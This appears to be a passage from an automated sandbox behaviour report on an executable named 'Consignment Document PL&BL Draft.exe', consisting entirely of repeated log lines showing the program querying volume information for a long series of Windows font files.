Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
